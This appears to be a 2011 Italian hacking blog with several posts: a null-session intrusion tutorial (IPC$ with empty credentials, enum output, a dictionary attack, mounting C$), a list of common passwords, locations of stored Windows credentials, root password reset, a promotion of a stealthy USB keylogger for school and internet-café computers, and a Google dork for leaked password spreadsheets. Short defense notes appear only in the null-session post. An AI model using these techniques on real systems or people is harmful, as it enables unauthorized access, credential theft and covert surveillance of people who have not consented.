mercoledì 30 novembre 2011

Intrusione informatica è semplice con una null session!

jockerLa Null Session è una sessione che permette di interagire con un sistema Windows senza dover effettuare l’autenticazione. Tramite la Null Session è possibile ottenere informazioni sul sistema, come l’elenco delle condivisioni e l’elenco degli utenti.

Ottenere l’elenco delle condivisioni può permettere un’intrusione semplice. Le condivisioni potrebbero non essere protette da password, nel qual caso si potrebbe accedere a informazioni importanti. Potrebbero anche esserci condivisioni attivate alla scrittura, eventualità che permetterebbe all’hacker di infiltrare un trojan nella cartella dell’esecuzione automatica.

Con l’elenco degli utenti si potrebbe tentare un attacco a dizionario, testando una lista di password contro ogni utente valido.

Infine le informazioni potrebbero essere utilizzate come leva per ottenere la fiducia di un impiegato in un attacco di social-engineering.

Creare la Null Session

Se provassimo a visualizzare le risorse di un computer senza effettuare una Null Session otterremmo un errore di accesso negato:

net view \\127.0.0.1

Per creare una Null Session bisogna utilizzare il comando net use, specificare l’indirizzo del computer, invocare la risorsa IPC$ e fornire credenziali nulle:

C:\Documents and Settings\angelor>net use \\127.0.0.1\IPC$ "" /u:""

Se il computer remoto accetta la Null Session, otterremo questo messaggio eseguendo net use senza parametri:

C:\Documents and Settings\angelor>net use
Stato       Locale     Remota                    Rete
-------------------------------------------------------------------------------
OK                     \\127.0.0.1\IPC$          Rete di Microsoft Windows
Esecuzione comando riuscita.

A questo punto net view visualizzerà l’eventuale lista di risorse (non quelle nascoste però).

Sfruttare la Null Session

Per facilitare l’interazione con la Null Session sono stati creati diversi tools. Alcuni tra questi sono enum, winfo e hunt. Con questi strumenti è possibile ottenere liste di utenti, risorse condivise (anche nascoste) e altre informazioni (come le policy delle password o la versione del sistema operativo) tramite Null Session. Vediamo nel dettaglio.

Sia hunt che winfo sono molto semplici da usare: bisogna invocare il comando da linea di comando specificando l’indirizzo Ip (nel formato preceduto da \\ se si utilizza hunt). Winfo permette di specificare se creare una Null Session prima di tentare il recupero delle informazioni.

Uno strumento a mio parere più potente è enum. Oltre ad avere più opzioni rispetto agli altri due, conesente anche un attacco a dizionario.

Ecco la lista delle opzioni di enum:

usage:  enum  [switches]  [hostname|ip]
-U:  get userlist
-M:  get machine list
-N:  get namelist dump (different from -U|-M)
-S:  get sharelist
-P:  get password policy information
-G:  get group and member list
-L:  get LSA policy information
-D:  dictionary crack, needs -u and -f
-d:  be detailed, applies to -U and -S
-c:  don't cancel sessions
-u:  specify username to use (default "")
-p:  specify password to use (default "")
-f:  specify dictfile to use (wants -D)

e un esempio con obiettivo Windows XP:

enum  -UMNSPGL 192.168.132.128
server: 192.168.132.128
setting up session... success.
password policy:
min length: none
min age: none
max age: 42 days
lockout threshold: none
lockout duration: 30 mins
lockout reset: 30 mins
opening lsa policy... success.
server role: 3 [primary (unknown)]
names:
netbios: TEST
domain: WORKGROUP
quota:
paged pool limit: 33554432
non paged pool limit: 1048576
min work set size: 65536
max work set size: 251658240
pagefile limit: 0
time limit: 0
trusted domains:
indeterminate
netlogon done by a PDC server
getting namelist (pass 1)... got 4, 0 left:
Administrator  Guest  HelpAssistant  SUPPORT_328945a3
getting user list (pass 1, index 0)... success, got 4.
Administrator  Guest  HelpAssistant  SUPPORT_328945a3
enumerating shares (pass 1)... got 3 shares, 0 left:
IPC$  ADMIN$  C$
getting machine list (pass 1, index 0)... success, got 0.
Group: Administrators
TEST\Administrator
Group: Backup Operators
Group: Guests
TEST\Guest
Group: Network Configuration Operators
Group: Power Users
Group: Replicator
Group: Users
NT AUTHORITY\INTERACTIVE
NT AUTHORITY\Authenticated Users
Group: Utenti desktop remoto
Group: HelpServicesGroup
TEST\SUPPORT_328945a3
cleaning up... success.

In questo esempio riusciamo ad ottenere la lista delle condivisioni (tutte nascoste in questo caso): IPC$,ADMIN$ e C$ e una lista di utenti, ovvero Administrator,Guest,HelpAssistant e SUPPORT_328945a3.

Utilizzando l’opzione D (dictionary crack, con -u per specificare l’utente e -f per specificare il dizionrio da usare) è possibile ottenere l’accesso e quindi “montare” in locale il disco C$ della macchina da attaccare:

net use H: \\192.168.132.128\C$

Per chi fosse alla ricerca di dizionari da utilizzare in attacchi di questo tipo consiglio questo indirizzo: http://packetstormsecurity.org/Crackers/wordlists/

Come Difendersi

I sistemi operativi Microsoft attualmente diffusi per default non mostrano la lista degli utenti. Per controllare, attivare o disabilitare la Null Session su Xp e Window 2003 è possibile utilizzare l’interfaccia grafica secpol.msc, da invocare da Start -> Esegui (o tasto Windows + R).

Le voci interessate sono le seguenti:

Criteri Local -> Opzioni di protezione

Accesso di rete: non consentire l’enumerazione anonima degli account SAM
Accesso di rete: non consentire l’enumerazione anonima di account e condivisioni SAM

Attivando entrambe le voci gli utenti anonimi (ovvero con credenziali nulle) non saranno in grado di elencare gli utenti e neppure la lista delle risorse condivise, riducendo notevolmente la superficie di attacco per un pirata.

Le porte Tcp/Udp coinvolte in questo attacco sono le seguenti: 135,137,138,139,445. Filtrarle con un personal firewall, perlomeno sull’interfaccia esposta a Internet può mitigare il pericolo e neutralizzare questo tipo d’attacco.

L’attacco Null Session è sicuramente uno dei più antichi attacchi per Windows, nel passato ha fatto molte vittime. Le policy di sicurezza standard delle ultime versioni di Windows (da XP Professional a Vista, Windows 2003 compreso) rendono questo attacco meno diffuso. Ma non è detto che non si trovino configurazioni deboli.                                fonte: http://www.pillolhacking.net

Arrivederci al prossimo articolo

Michele Balzano  

lunedì 28 novembre 2011

Le 25 password più popolari del 2011

pigrizia_mentale

Collettivamente sembra che noi esseri umani in fatto di fantasia siamo molto pigri. Basta dare un'occhiata a come molte password d'accesso siano facili da indovinare.

A dimostrazione di questa mia affermazione di seguito allego le 25 password più usate del 2011.

Il risultato non è molto diverso degli anni precedenti e il che non dovrebbe davvero essere una sorpresa, vero?

Le classifiche sono state create da SplashData che ha realizzato la statistica sui dati provenienti da milioni di password rubate e pubblicate online dagli hacker nel 2011.

ed ecco il risultato che mostra quanto siamo pigri quando scegliamo una password:

1.  password
2.  123456
3.  12345678
4.  qwerty
5.  abc123
6.  monkey
7.  1234567
8.  letmein
9.  trustno1
10. dragon
11. baseball
12. 111111
13. iloveyou
14. master
15. sunshine
16. ashley
17. bailey
18. passw0rd
19. shadow
20. 123123
21. 654321
22. superman
23. qazwsx
24. michael
25. football

Sperando che serva a mettervi in guardia e a spronarvi ad essere più fantasiosi nella creazione di una password. (come scegliere una password resistente)

Arrivederci al prossimo articolo

Michele Balzano

venerdì 25 novembre 2011

Eliminare la password dimenticata di Outlook Express


Nel caso in cui abbiate dimenticato la password per accedere ad Outlook Express potete eliminarla con un semplice intervento all'interno del Registro di sistema di Windows.

Avviate l'Editor del Registro di sistema (Avvio/Start , Esegui..., REGEDIT) quindi selezionate la voce "Trova" dal menù "Modifica" quindi inserite, all'interno del campo di ricerca, la seguente chiave:
89c39569-6841-11d2-9f59-0000f8085266

Provvedete quindi a cancellare solo ed esclusivamente le sue sottochiavi.

Aprite nuovamente Outlook Express e specificate una nuova password per l'accesso.

Tenete presente che la sottochiave "name" e la "user id" sono la stessa cosa.

Se siete a conoscenza della user id portatevi in corrispondenza della chiave seguente:
HKEY_CURRENT_USER\Identities, in modo da reperire il nome della chiave contenente la password di Outlook Express"



Arrivederci al prossimo articolo
Michele Balzano

Il mio sistema è in Crash!

Fantastica!!

Root Password Recovery – Recuperare la Password di root


Se hai perso la password di root, non disperarti, e facile cambiarla  Il trucco sta nel passare una opzione single al kernel durante il boot.

Se usi Grub: 
1)  Seleziona il tuo linux nel menu grafico di grub e premi e
2)  Scegli l'immagine del kernel e ripremi e.
3)  Aggiungi la parola single alla fine, premi invio, premi b  premi invio.
4)  Passo successivo:       passwd root
     Segui il video per cambiare la password.
5)  Successivamente, fai  sync; reboot
Questo è tutto! La modalita' Single user è di aiuto se vuoi fare manutenzione al sistema senza tutti i
servizi avviati, corrisponde alla modalita' provvisoria di Windows.

Se invece usi Lilo:
1)  Avvia la macchina, al prompt di LILO digita:
      linux single
2)  Passo successivo: passwd root
Segui il video per cambiare la password.
3)  Successivamente:  sync; reboot

Traduzione: Vito Russo
Guida pubblicata su http://linux.le.it

venerdì 18 novembre 2011

Dove sono memorizzate le password di Windows



Molte persone mi chiedono informazioni relativamente a come windows conserva le password delle più diffuse applicazioni.
In questo post cercherò di dare una risposta indicandovi la posizione nel Registro di sistema o del file di  in cui le applicazioni Windows memorizzano le password.
Così ho preparato un elenco di percorsi di memorizzazione delle password per le applicazioni e componenti di Windows più popolari.
Siate consapevoli che, anche se si conosce la posizione delle password salvate, questo non significa che siano leggibili in chiaro, infatti per lo più sono crittografate con sistemi propetari in più non è possibile copiarle da un computer ad un altro. Molte applicazioni memorizzano le password in modo tale da impedire il loro trasferimento ad un altro computer o ad un'altro profilo utente. Tuttavia, è possibile utilizzare queste informazioni per rimuovere i password salvate nel sistema.

Elenco applicazioni e percorsi:

  • Windows password di rete (XP/Vista/2003): Quando ci si connette al file system di un altro computer della rete (qualcosa come \ \ MyComp\ MyFolder), Windows vi permette di salvare la password. Se si sceglie di salvare la password, la password cifrata viene memorizzata in un file di credenziali. Il file viene memorizzato nella credenziale seguenti posizioni:
  • Windows XP/2003: %USERPROFILE%\Impostazioni locali\Dati applicazioni\Microsoft\Credentials\[User   SID]\Credentials 
  • Windows Vista:  %USERPROFILE%\Impostazioni locali\Dati applicazioni\Roaming\Microsoft\Credentials
È possibile utilizzare il mio RecoveryAllPassword per visualizzare tutte le password memorizzate in questi file Credenziali.
  • Internet Explorer 4,00-6,00: Le password sono memorizzate in un percorso segreto nel Registro di sistema conosciuto come "Protected Storage". La chiave di base del Protected Storage si trova sotto la seguente chiave: "HKEY_CURRENT_USER \ Software \ Microsoft \ Protected Storage System Provider ". Per visualizzare le sottochiavi di questa chiave in RegEdit, è necessario loggarsi come utente SYSTEM. (guarda qui come fare) non sarà possibile comunque guardare la password in chiaro perché cifrata. Inoltre, questa chiave non può facilmente essere trasportata da un computer all'altro, come si fa per tutte le chiavi regolari.
È possibile utilizzare il mio RecoveryAllPassword per visualizzare tutte le password memorizzate in questi file Credenziali.
  • Internet Explorer 7,00-8,00: Le nuove versioni di Internet Explorer memorizzano le password in 2 sedi diverse. Le password del completamento  automatico vengono memorizzate nel Registro di sistema in HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\Storage2. Le password di autenticazione HTTP sono memorizzate nel file delle credenziali in %USERPROFILE%\Dati applicazioni\Microsoft\Credenziali, insieme con le password di login del computer della LAN ed altre password.
È possibile utilizzare il mio RecoveryAllPassword per visualizzare tutte le password memorizzate in questi file Credenziali.
  • Firefox: le password vengono memorizzate in uno dei seguenti file: signons.txt, signons2.txt e signons3.txt (dipende dalla versione di Firefox) Questi file password si trovano all'interno della cartella del profilo di Firefox, in [Windows profilo] \ Application Data \ Mozilla \ Firefox \ Profiles \ Nome Profilo, inoltre, key3.db, che si trova nella stessa cartella, viene utilizzata per la cifratura / Descrizione delle password.
  • Google Chrome browser Web: Le password vengono memorizzate in %USERPROFILE%\Impostazioni locali\Dati applicazioni\Google\Chrome\User Data\Default\Web Data (questo è il nome del file database SQLite che contiene le password criptate e altre cose)
  • Opera: Le password sono memorizzate in file wand.dat, che si trova sotto %USERPROFILE%\Impostazioni locali\Dati applicazioni\Google\Chrome\User Data\Default\Web Data\Opera\Opera profilo
  • Outlook Express (tutte le versioni): Le password POP3/SMTP/IMAP Outlook Express sono memorizzate anche nella Protected Storage, come le password di vecchie versioni di Internet Explorer.
  • Outlook 98/2000: Le vecchie versioni di Outlook memorizzano le password POP3/SMTP/IMAP in Protected Storage, come le password di vecchie versioni di Internet Explorer.
  • Outlook 2002-2008: tutte le nuove versioni memorizzano le password di Outlook nella stessa chiave del Registro di sistema delle impostazioni dell'account. Gli account sono memorizzati nel Registro di sistema in HKEY_CURRENT_USER\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\[Profile Name]\9375CFF0413111d3B88A00104B2A6676\[Account Index] Se si utilizza Outlook per la connessione di un account sul server di Exchange, la password viene memorizzata nel file delle Credenziali, insieme con le password di login del computer della LAN.
 È possibile utilizzare il mio RecoveryAllPassword per visualizzare tutte le password di Outlook 2002-2008.
  • Windows Live Mail: Tutte le impostazioni dell'account, comprese le password criptate, sono memorizzati in %USERPROFILE%\Impostazioni locali\Dati applicazioni\Microsoft\Windows Live\ [Nome account Mail] Il nome del account è un file XML.
 È possibile utilizzare il mio RecoveryAllPassword per visualizzare tutte le password di  Windows Live Mail.
  • Thunderbird: Il file di password si trova sotto %USERPROFILE%\Impostazioni locali\Dati applicazioni\ Thunderbird \ [Nome profilo] Si dovrebbe cercare un nome di file con estensione. s.
  • Google Talk: Tutte le impostazioni dell'account, comprese le password criptate, sono memorizzate nel Registro di sistema in HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts\[Account Name]
  • Google Desktop: password di e-mail sono memorizzate nel Registro di sistema in HKEY_CURRENT_USER\Software\Google\Google Desktop\Mailboxes\[Account Name]

  • MSN / Windows Messenger versione 6.x : Le password vengono memorizzate in una delle seguenti posizioni:
  1. Chiave di registro: HKEY_CURRENT_USER Software \ Microsoft \ MSNMessenger
  2. Chiave di registro: HKEY_CURRENT_USER Software \ Microsoft \ MessengerService
  3. Nelle credenziali di file, con voce denominata come "* Passport.Net \ \". (Solo quando il sistema operativo è XP o superiore)
  • MSN Messenger versione 7.x: Le password vengono memorizzate in HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Creds\[Account Name]
  • Windows Live Messenger versione 8.x/9.x: Le password vengono memorizzate nel file delle credenziali, con nome di voce inizia con "WindowsLive: name =". 
È possibile utilizzare il mio RecoveryAllPassword per visualizzare tutte le password memorizzate in questi file Credenziali.

  • Yahoo Messenger 6.x: La password viene memorizzata nel Registro di sistema in HKEY_CURRENT_USER \ Software \ Yahoo \ Pager ("valore EOptions stringa")
  • Yahoo Messenger 7.5 o versione successiva: La password viene memorizzata nel Registro di sistema in HKEY_CURRENT_USER \ Software \ Yahoo \ Pager - "ETS" valore. Il valore memorizzato in "valore ETS" non possono essere recuperati.
  • AIM Pro: Le password sono memorizzate nel Registro di sistema, in HKEY_CURRENT_USER \ Software \ AIM \ AIMPRO account \ [Nome]
  • AIM 6.x: Le password sono memorizzate nel Registro di sistema, in HKEY_CURRENT_USER \ Software \ America Online \ AIM6 password \
  • ICQ Lite 4.x/5.x/2003: Le password sono memorizzate nel Registro di sistema, in HKEY_CURRENT_USER \ Software \ Mirabilis \ ICQ \ NewOwners \ [ICQ] (valore MainLocation)
  • ICQ 6.x: l'hash della password viene memorizzata in %USERPROFILE%\Impostazioni locali\Dati applicazioni\ICQ\ nome utente\Owner.mdb (Access Database) (l'hash della password non può essere recuperato)
  • Digsby: La password principale di Digsby è archiviato in %USERPROFILE%\Impostazioni locali\Dati applicazioni\ Digsby\ digsby.dat tutte le altre password vengono memorizzate nei server Digsby.
  • PaltalkScene: Le password sono memorizzate nel Registro di sistema, in HKEY_CURRENT_USER \ Software \ Paltalk [account] \ Nome.
Con questo tutorial ho cercato di scendere un pò nei meandri segreti di Windows, per tutti quelli che vogliono approfondire di seguito un link ad un articolo che riassume il mio Libro "Password No Problem"
Arrivederci al prossimo articolo
Michele Balzano


giovedì 10 novembre 2011

Keylogger su usb gratis!

UsbRecKey è il più piccolo e il più efficace software keylogger da usare su pen drive USB. Il software è leggero e compatibile con qualsiasi sistema Windows. Registra automaticamente nella penn drive USB un file log con l'elenco di tutte le applicazioni in uso sul computer ed il testo digitato all'interno di tali applicazioni (conversazioni di chat, mail, documenti, nomi utente, password, etc) (Registratore di Tasti).
Registra le navigazioni effettuate con tutti i più comuni browser e salva le schermate del desktop ogni 30 secondi, ma è possibile scegliere un intervallo di tempo a piacere.
Il software è ideale per chi ha necessità di monitorare computer per un determinato lasso di tempo e di non lasciare alcuna traccia sul computer dopo il periodo di monitoraggio.
Un esempio può essere :
  • Aule Universitarie
  • Computer Scuola Guida (quelli usati per gli esami)
  • Internet Cafè
  • Aule Informatiche
Il software è completamente gratuito e non è necessaria la registrazione per il download. Per l'installazione è necessario indicare il percorso della pen drive USB (di almeno un 1 Gb) al resto penserà il software.

Per l'utilizzo invece bastarà inserire la pen drive in un computer con Windows XP / Seven / Vista o Windows Server, lanciare dalla pen drive il file UsbRecKey. Nella pagina principale del software impostiamo la frequenza di acquisizione dei print screen, poi premiamo Shift+F9 per nasconderlo e lasciarlo attivo in memoria.
Per leggere il file contenente tutte le registrazioni basterà andare nella pen drive USB e aprire il file di testo con la data che ci interessa, per esempio quello di oggi alle ore 16:21:20 sarà "log_11-16-11_16-21-20.txt"
Per vedere i print screen dello schermo basterà andare nella cartella SnapShots della pen drive.
 
Finestra principale di UsbRecKey - Software Keylogger su usb
 
Il software è gratuito ed è possibile prelevarlo da qui
Arrivederci al prossimo Articolo
OcchiolinoMichele Balzano

 

lunedì 7 novembre 2011

Trovare file e documenti riservati nel Deep Web.

 

powerpoint-256x256excel-iconmicrosoft-word-logoimage20[1]

Come trovare file Pdf, Word, Excel, PPS ecc, col motore di ricerca di Google

Per poter, ricercare files: pdf, word, excel, powerpoint, ecc; basta inserire nella barra di navigazione di Google, prima del nome del documento che stiamo cercando, queste stringhe:

filetype:pdf  (per cercare file PDF)

filetype:doc  (per cercare file Word)

filetype:ppt  (per cercare file Power Point)

filetype:xls   (per file Excel)

Ad esempio :

Vorrei cercare manuali d’uso di Windows XP in formato Word

Quindi scrivo nel campo delle ricerche di Google: filetype:doc Manuale Windows XP

image

come vedete per magia il primo risultato è un bellissimo documento Word contenente un ottimo manuale di Windows XP in italiano!!

Lo stesso tipo di ricerche possono essere effettuate, ovviamente, variando il nome del soggetto, ossia del file che c'interessa. Quindi, se al posto di "Manuale di Windows XP", per esempio stiamo cercando un libro, o una poesia, inseriremo il nome adeguato. Vedi: "I Promessi Sposi"; o "Alessandro Manzoni", ecc ecc. Se poi intendiamo ricercare qualcosa di più riservato dobbiamo solo affidarci alla nostra fantasia …magari un

“filetype:xls lista password utenti”

potrebbe darci risultati del tutto inaspettati e sorprendenti… Occhiolino

Arrivederci al prossimo articolo

Michele Balzano

Post più popolari